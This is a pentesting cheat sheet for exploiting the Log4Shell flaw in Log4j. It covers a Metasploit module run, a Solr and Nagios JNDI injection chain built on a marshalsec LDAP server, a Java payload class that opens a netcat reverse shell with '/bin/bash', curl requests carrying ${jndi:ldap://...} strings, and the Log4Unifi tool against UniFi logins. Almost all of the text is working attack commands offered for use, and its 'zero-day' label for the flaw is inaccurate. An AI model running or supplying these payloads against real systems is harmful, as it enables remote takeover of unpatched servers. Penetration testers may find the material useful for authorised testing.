Log4j Pentesting

Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.

msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell


Exploit Apache Solr (JNDI)

You need to prepare your four local terminals.

1. Start LDAP Server on Your Local Terminal 1

  1. Install Maven
    sudo apt install maven
  1. Get the Payload

    Download the repository.

    git clone https://github.com/mbechler/marshalsec.git
    cd marshalsec
Then build the marshalsec utility
    mvn clean package -DskipTests
  1. Start LDAP Server
    java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"

2. Host the Exploit on Your Local Terminal 2

  1. Create the Exploit with Java

    First, create a new directory and create a new exploit named "Exploit.java" in the directory.
    Open your favorite editor like vim.

    mkdir exploit
    cd exploit
    vim Exploit.java
In editor, enter the following code.
    public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    }
  1. Compile the Payload
    javac Exploit.java -source 8 -target 8
  1. Start Web Server to Host the Payload
    python3 -m http.server 8000

3. Open Listener on Your Local Terminal 3

nc -lvnp <your-local-listener-port>

4. Send Request the Target Website

# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'


Exploit Unifi Network using Log4Unifi

Log4Unifi is an exploitation Log4j tool in Unifi Network.

1. Test the Vulnerability in the Target Web Page

curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'

2. Open Listener on Your Local Machine

nc -lvnp 4444

3. Exploit

Download the exploit from the repository.

git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4Unifi

Exploit

python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444